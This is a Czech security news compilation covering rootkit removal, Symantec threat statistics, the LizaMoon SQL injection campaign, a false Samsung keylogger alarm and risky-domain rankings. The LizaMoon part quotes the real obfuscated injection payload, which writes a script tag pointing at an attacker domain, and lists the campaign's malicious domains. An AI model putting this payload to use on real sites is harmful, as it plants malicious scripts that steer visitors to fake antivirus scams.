Kaspersky TDSSKiller – detekce a odstranění rootkitů

TDSSKiller určitě neodhalí všechny rootkity, ale za vyzkoušení stojí – zkontroluje služby, ovladače a boot sektor a měl by stačit tam, kde se v systému uchytí některý z nejčastěji se vyskytujících rootkitů (TDSS, Sinowal, Whistler, Phanta, Trup, Stoned).

TDSSKiller (How to detect and remove unknown rootkits) je malý program bez nutnosti instalace. Po stažení TDSSKiller.zip postačí archiv rozbalit a spustit TDSSKiller.exe. Ten můžete spouštět v klasicky spuštěných Windows i v případě, že jste spustili „Safe Mode“ a řešíte problémy se systémem.

Symantec: Dramaticky roste počet i rafinovanost kybernetických hrozeb

Každoroční Internet Security Threat Report (ISTR) od Symantecu je venku. V pořadí již šestnáctý přehled o aktivitách kyberzločinců je zajímavé čtení. Místy ohromuje čísly (286 milionů nových hrozeb v roce 2010), místy nutí k přemýšlení nad tím, jak pokročilé jsou metody autorů virů a malware.

Symantec upozorňuje, že dochází v růstu v počtu cílených útoků na firmy a útoky jsou stále důmyslnější. Útočníci rozšířili své aktivity do sociálních sítí, začali více využívat Javu a větší pozornost věnují mobilním zařízením.

Nejdůležitější informace ve zprávě

  • 286 miliónů nových hrozeb – Různé varianty a nové mechanismy, jako jsou webové útočné sady, i nadále zvyšují objem škodlivých programů. Symantec zaznamenal v roce 2010 více než 286 milionů unikátních škodlivých programů.

  • O 93 % více útoků spojených s webovými stránkami – Počet webových útočných sad vzrostl o 93 % v roce 2010. Růst zapříčinilo i použití zkrácených URL.

  • Únik 260 000 identit při jednom narušení – Jedná se o průměrný počet identit uniklých při narušení dat způsobené hackováním v průběhu roku 2010.

  • 14 nových 0day zranitelností – Zranitelnosti nultého dne hrály klíčovou roli u cílených útoků, včetně Hydraq a Stuxnet. Stuxnet používal čtyři různé zranitelnosti nultého dne, což je zcela unikátní.

  • 6 253 nových zranitelností – Symantec zaznamenal v roce 2010 více zranitelností než kdykoli dříve.

  • O 42 % více mobilních zranitelností – Počítačoví zločinci se začínají více zaměřovat na mobilní zařízení, o čemž svědčí i nárůst zranitelností operačních systémů ze 115 v roce 2009 na 163 v roce 2010.

  • Jeden botnet s více než milionem spambotů – Rustock, největší botnet roku 2010, měl pod svou kontrolou více než jeden milion botů. Ostatní velké botnety, jako Grum a Cutwail, měly stovky tisíc botů.

  • 74 % spamu spojeno s farmaceutickými produkty – Téměř tři čtvrtiny veškeré nevyžádané pošty bylo v roce 2010 spojeno s farmaceutickými výrobky.

  • 15 $ za 10 000 botů – Symantec zaznamenal ve fórech podzemní ekonomiky reklamu, která lákala na cenu 15 $ za 10 000 infikovaných počítačů. Boti se obvykle používají k rozesílání spamu nebo ke kampaním na falešný sofware (například vybízí ke koupi falešného antiviru), ale ve stále větší míře se používají k útokům DDoS.

  • 0,07 $ až 100 $ za kreditní kartu – Cena za údaje o kreditní kartě byla na fórech podzemní ekonomiky velmi různorodá. Cenu ovlivňovaly různé faktory, jako je vzácnost karty nebo sleva při hromadném nákupu.

Stuxnet a Hydraq, dva z nejznámějších počítačových útoků v roce 2010, představovaly reálné případy kybernetické války a zásadně změnily povahu hrozeb,” říká Stephen Trilling, senior vice president, Symantec Security Technology and Response. „Hrozby se více rozšiřují a nezaměřují se jen na jednotlivé bankovní účty, ale  také na informace a fyzické infrastruktury národních států.

Rok 2010: Rok cílených útoků

Cílené útoky, jako jsou Hydraq a Stuxnet, znamenaly pro firmy v roce 2010 ještě větší nebezpečí. Útočníci pro proniknutí do počítačových systémů stále častěji využívali 0day zranitelnosti, což zvyšovalo pravděpodobnost úspěchu a znesnadňovalo jejich identifikaci. Například Stuxnet v tomto ohledu byl zcela unikátní, jelikož využíval hned čtyři různé zranitelnosti nultého dne.

V roce 2010 se útočníci zaměřili na společnosti obchodující s cennými papíry na burze, nadnárodní korporace, vládní agentury i řadu menších firem. Přesně cílené sociální inženýrství jim pak umožnilo přístup do firemní sítě – cílem byly krádeže duševního vlastnictví i získávání osobních údajů. Nabourání do sítě a narušení dat v průměru vyústilo v únik 260 000 identit v roce 2010, což je téměř čtyřnásobek, než způsobily jiné způsoby úniku.

Sociální sít, fenomén i pro kyberzločin

Jedna z hlavních útočných technik používaných na stránkách sociálních sítí bylo zkracování URL. Zkrácené URL slouží k efektivnímu sdílení jinak komplikovaných webových adres v e-mailu nebo na webových stránkách. V minulém roce využili útočníci milióny těchto zkrácených odkazů na webové stránky na sociálních sítích a dramaticky zvýšili účinnost phishingových a malwarových útoků.

Na sociální síti se odkazy automaticky šíří přes přátele oběti a během několika minut se odkaz může šířit na stovky až tisíce uživatelů. 65 % škodlivých odkazů v nových příspěvcích, které zaznamenala společnost Symantec, používalo zkrácené URL. Na 73 % z nich bylo kliknuto minimálně 11-krát a na 33 % bylo kliknuto 11-krát až 50-krát.

Mobilní telefony jsou novým užitečným nástrojem

Užitečným nástrojem nejenom pro jejich vlastníky, ale také pro hacking, spam, podvody a řadu dalších podobných aktivit. V roce 2010 měla většina malwarových útoky na mobilní zařízení podobu trojského koně, který se tvářil jako legitimní aplikace. Útočníci řadu aplikací vytvořili zcela od začátku, ale v mnoha případech infikovali již existující legitimní aplikace. Útočníci potom tyto nakažené aplikace distribuovali v běžných internetových obchodech s aplikacemi. Například autoři Pjapps Trojan použili tento přístup.

LizaMoon SQL injection útok stále pokračuje, až 1.5 milionu nakažených stránek

SQL Injection útok pojmenovaný LizaMoon v Google indexu ukazuje už na 559 tisíc nalezených výsledků a TrendLabs upozorňuje na další rozšíření používaných domén.

LizaMoon, Etc. SQL Injection Attack Still Ongoing upozorňuje, že LizaMoon útočníci rozšířili počet domén, které používají pro spouštění útočného kódu. Útoky zatím stále pokračuje a pokud se podíváte na čísla v Google, tak od prvního dubna došlo k zdvojnásobení počtu zjištění nakažených adres. Podle GCN je nakaženo až 1.5 milionu webových stránek.

V ČR jsou viditelné tři nakažené weby – stavebnistandardy.cz, forum.mzh.cz a filatelie-stosek.cz, tady jeden nový od prvního dubna. Napadení počítačů návštěvníků těchto webů podle Trend Micro probíhá pomocí TROJ_FAKEAV.BBK a TROJ_WORID.A. Návštěvník napadené stránky je přesměrován na nabídku falešného antiviru (Windows Stability Center), který se klasickým podvodem snaží uživatele přesvědčit, že jeho počítač je zavirovaný a měl by si pořídit (falešný) antivir. Pokud uživatel nabízený falešný antivir nainstaluje, je ztracen.

Zdroj: Update on LizaMoon mass-injection and Q&A

Počet používaných domén pro útočný skript už jde do desítek

lizamoon.com/ur.php
tadygus.com/ur.php
alexblane.com/ur.php
alisa-carter.com/ur.php
online-stats201.info/ur.php
stats-master111.info/ur.php
agasi-story.info/ur.php
general-st.info/ur.php
extra-service.info/ur.php
t6ryt56.info/ur.php
sol-stats.info/ur.php
google-stats49.info/ur.php
google-stats45.info/ur.php
google-stats50.info/ur.php
stats-master88.info/ur.php
eva-marine.info/ur.php
stats-master99.info/ur.php
worid-of-books.com/ur.php
google-server43.info/ur.php
tzv-stats.info/ur.php
milapop.com/ur.php
pop-stats.info/ur.php
star-stats.info/ur.php
multi-stats.info/ur.php
google-stats44.info/ur.php
books-loader.info/ur.php
google-stats73.info/ur.php
google-stats47.info/ur.php
google-stats50.info/ur.php

WebSense (odkud je také předchozí seznam používaných domén) nabízí i pohled na kód používaný pro SQL Injection, další detaily nabízí Attack on ASP site that uses a SQL server database na StackOverflow.com

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)

+as+varchar(8)))–

Prozatím není jasné jak je SQL Injection využíváno – známé je, že se týká pouze webů používajících Microsoft SQL Server. A také, že nejde o chybu v MSSQL – je využívána chyba v nějakém jiném software, které tyto weby používají.

SQL Injection útok uspěl až na stovkách tisíc adres

Stovky tisíc kompromitovaných webových adres v masivním útoku využívajícím SQL Injection, vsunutí SQL kódu do neošetřeného vstupu webové aplikace. Vsouván je odkaz s útočným skriptem kdy je uživatel přesměrován na podvodné „antivirové“ software.

Chyba při zpracování vstupních parametrů umožňuje útočníkům využít tzv. SQL Injection – vsunutí SQL kódu. Ten se potom spustí ve webové aplikaci a umožní vložit data do SQL serveru. Používá se jako tradiční prostředek pro hacking, ale své využití má už řadu let ve vkládání spamu – zejména odkazů na útočný kód.

K tématu :

Čerstvá vlna útoku vkládá odkaz na JavaScript z domén lizamoon.com a  alisa-carter.com (v obou případech odkaz vede na ur.php a obě domény jsou aktuálně odstavené a nefunkční). Než se útoku podařilo zamezit odstavením používaných domén, odkaz návštěvníka napadeného webu zavedl na nabídku podvodného „antivirového“ software.

Útočný kód se dostal i na tak prominentní místa jako je Apple iTunes – najdete ho na stránkách některých produktů. Nedostal se tam napadením iTunes, ale zvenčí, přes data získávána přes RSS a importovaná do produktových stránek. Útočný kód na iTunes je nefunkční – Apple příchozí RSS zpracovává způsobem, který zamezuje vykonání.

Aktuální vlna útoků je dokumentována websense v LizaMoon mass injection hits over 226,000 URLs (was 28,000) a pohledem do Google můžete snadno zjistit, kolik URL je již v indexu Google  -(aktuálně 292 tisíc pro lizamoon.com variantu a 98 tisíc pro alisa-carter.com variantu). Problém se nevyhnul ani České republice – v indexu Google najdete napadený web StavebniStandardy.cz a filatelie-stoesk.cz.

Velmi pravděpodobně ale existují ještě další varianty umístění útočného skriptu – hledání na ur.php v Google nabízí 291 tisíc výsledku a další rozdílné domény – google-stats50.info, multi-stats.info, google-stat48,info, alexblane.com a řadu dalších.

Samsung nedává na notebooky keylogger, falešný poplach

Skandál, Samsung měl podle jednoho zdroje (který se nikdo dlouho nenamáhal prověřit) dávat na své počítače keylogger. Šmírovací software umožňující vědět co uživatel píše a pořizovat screenshoty. Falešný alarm antivirového software. Samsung je nevinný.

Samsung installs keylogger on its laptop computers informuje o alarmujícím zjištění. Na čerstvě koupeném notebooku od Samsungu je keylogger – StarLogger, který má být důkladně skrytý před antivirovými a antimalware programy je zjištění přítomnost jedné složky na disku (viz citace níže).

While setting up a new Samsung computer laptop with model number R525 in early February 2011, I came across an issue that mirrored what Sony BMG did six years ago.  After the initial set up of the laptop, I installed licensed commercial security software and then ran a full system scan before installing any other software. The scan found two instances of a commercial keylogger called StarLogger installed on the brand new laptop. Files associated with the keylogger were found in a c:windowsSL directory.

Článek dokonce přímo zmiňuje, že „This key logger is completely undetectable and starts up whenever your computer starts up. “ – tedy, že keylogger není možné detekovat a spouští se při spuštění počítače.

Skandál, pokud by něco takového byla pravda. Článek má pokračování (Samsung responds to installation of keylogger on its laptop computers), ve kterém dochází k zásadnímu zjištění – technická podpora Samsungu prý potvrdila, že tento software Samsung na počítače instaluje.

He confirmed that yes, Samsung did knowingly put this software on the laptop to, as he put it, „monitor the performance of the machine and to find out how it is being used.“

Třetí pokračování, Samsung investigating report of keylogger on its laptops, informuje o zahájení šetření.

Aféra?

Těžko říct, protože o něco později přichází False alarm over Samsung keylogger, které upozorňuje, že samotná přítomnost c:windowssl složky na disku vede u antivirových programů k mylnému konstatování, že je přítomen právě StarLogger keylogger. A také že tato složka je vytvářena Microsoft Live instalační procedurou. Potvrzuje to i Samsung laptos are in fact secure (Samsung Tomorrow) a ukazuje jak k omylu došlo – použitím antivirového software VIPRE.

Jeden z mála, kdo se vydal ověřit skutečnost, byl Mikko Hypponen z F-Secure – keylogger se mu na Samsung noteboocích najít nepodařilo (No keyloggers on Samsung laptops as far as we know)

No, we did not find StarLogger, or any keyloggers from the laptops we tested. These included Samsung R540, RF710, QX310, SF510, X125 and NF310. They were all running different versions of Windows 7. Note that the list includes Samsung R540, which was one of the laptop models mentioned in the original Network World report.

Na praktický test navazuje v Confirmed: Samsung is not shipping keyloggers a potvrzuje zde zjištění, že šlo o mylný výsledek testu právě od VIPRE antivirového produktu. VIPRE k „zjištění přítomnost keyloggeru“ dokonce stačí prázdná c:windowssl složka.

Gartner Magic Quadrant: Symantec lídrem trhu v oblasti ochrany koncových bodů

Nový 2010 Magic Quadrant pro Endpoint Protection řadí Symantec Endpoint Protection mezi přední řešení trhu a trh s antivirovým řešením tradičně ostře kritizuje

Průmysl ochrany koncových bodů (Endpoint Protection) se podle Gartnerů v roce 2010 z pohledu výrobců nijak výrazně nezměnil. Nedošlo ani k žádné výrazně změně v přesnosti a schopnosti detekovat malware a antivirové řešení se většinou točí okolo klasického systému detekce podle signatur, místo řešení základů problému. Gartneři upozorňují i na selhání HIPS (Host-based Intrusion Prevention System) s ohledem na nesplněná očekávání vlivem velkých nárok na management.

Gartner Magic Quadrant: Symantec lídrem trhu v oblasti ochrany koncových bodů

Zpráva se i poměrně ostře opírá do dlouhotrvajícího selhávání antivirových tvůrců při reakcích na aktuální bezpečnostní rizika – a pro rok 2010 se jim, podle zprávy, podařilo zaostat ještě více. Testy ukazují, že aktuální antivirová řešení jsou pouze zhruba v 50% efektivní při zjišťování nových variant existujících hrozeb a ještě hůře na tom jsou při detekci cílených či málo rozšířených hrozeb.

Čtvrtina uživatelů vypíná antivirový program

avira_logo_red_rgbNěmecká Avira průzkumem zjistila zajímavé informace o používání antivirových programů. Nejpodstatnější je to, že čtvrtina uživatelů vypíná antivirové software, protože se domnívá, že zpomaluje jejich počítač.

  • 60% uživatelů zkouší více antivirových produktů v průběhu jednoho roku (na tom samém počítači)
  • 12% přemýšlelo o tom, že by přestali používat internet

Výsledky jsou založené na 9 901 odpovědích ze vzorku uživatelů antivirového software společnosti Avira. Ta z výsledků vyvozuje hlavně to, že antivirový software by měl dbát zejména na to, aby měl minimální dopad na výkon systému.

Jedna licence Avastu použita 774 651 uživateli v 200 zemích

Avast šíření licenčního čísla uniklého online nezastavil a sledoval dění. Po roce a půl se tato konkrétní licence ocitla na skoro tři čtvrtě milionu počítačů.

We found our licence code at a number of warez sites around the globe, uvedl Vince Steckler, šéf Avast Software. Paradoxem všeho je, že Avast nabízí svůj antivirový program i ve zdarma dostupné verzi – vytrvalé hledání „pirátské“ kopie uživateli tak působí poněkud kontraproduktivně.


Ti co předmětné „magické“ licenční číslo užívají se nyní dočkali výzvy s odkazem na zdarma dostupnou verzi a možnosti zakoupit si verzi plnou.

Nejvíce nebezpečné domény – COM, INFO, VN, CM, AM, CC

Každoročný zpráva McAfee mapující výskyt virů a škodlivého software na jednotlivé internetové domény přináši několik překvapení – .VN (Vietnam) se vyšvihl na třetí místo a .info se stalo ješětě více nebezpečným místem. Česká republika je stále na 54 místě.

Mapping the Mal Web (PDF, PDF z roku 2009) každoročně zveřejňuje žebříček domén podle rizikovosti – jaká je míra rizika, že na nich chytnete nějaký ten virus, malware, trojský kůň či jinak škodlivé software. A rok od roku upozorňuje, že se zvětšuje rizikovost při brouzdání po Internetu.

Míra rizika při brouzdání na Webu stoupá
Míra rizika při brouzdání na Webu stoupá

TOP 10 nebezpečných domén

Dávat si pozor při vstupu na .COM domény je složité – u ostatních domén je to už jednoduché. Prostě pokud uvidíte v odkazu podivné domény jako VN/CM/AM/CC/WS, postačí zvolit sebezáchovný pud a na danou doménu nejít. Překvapivý je vývoj u domény .INFO – ta se v míře nebezpečnosti posunula z pátého na druhé místo – hackery, spammery a škodiči je tedy stále oblíbenější.

Země/původ TLD Míra  nebezpečí Pozice v roce 2009
Komerční .COM 31,3% 2
Informační .INFO 30.7% 5
Vietnam .VN 29.4% 39
Kamerun .CM 22.2% 1
Arménie .AM 12,1% 23
Kokosové ostrovy .CC 10,5% 14
Asie/Pacifik .ASIA 10,3%
Síť .NET 10,1% 7
Rusko .RU 10,1% 9
Západní Samoa .WS 8,6% 7

Jak jsme na tom ve Východní Evropě

Kde je v žebříčku Česká republika? Jak můžete vidět v následujícím výňatku z celkové tabulky, jsme na 54 místě s mírou nebezpečnosti 0,6% – a na stejném místě jsme byli v roce 2009. Z 101 781 sledovaných českých domén jich rizikových bylo zjištěno 1 068.

Polsko na dvacátém místě bylo loni šedesáte.

Pozice v žebříčku Země TLD Míra nebezpečí
18 Rumunsko .RO 3,7%
20 Polsko .PL 3,4%
42 Slovensko .SK 0.9%
54 Česká republika .CZ 0,6%
65 Maďarsko .HU 0,4%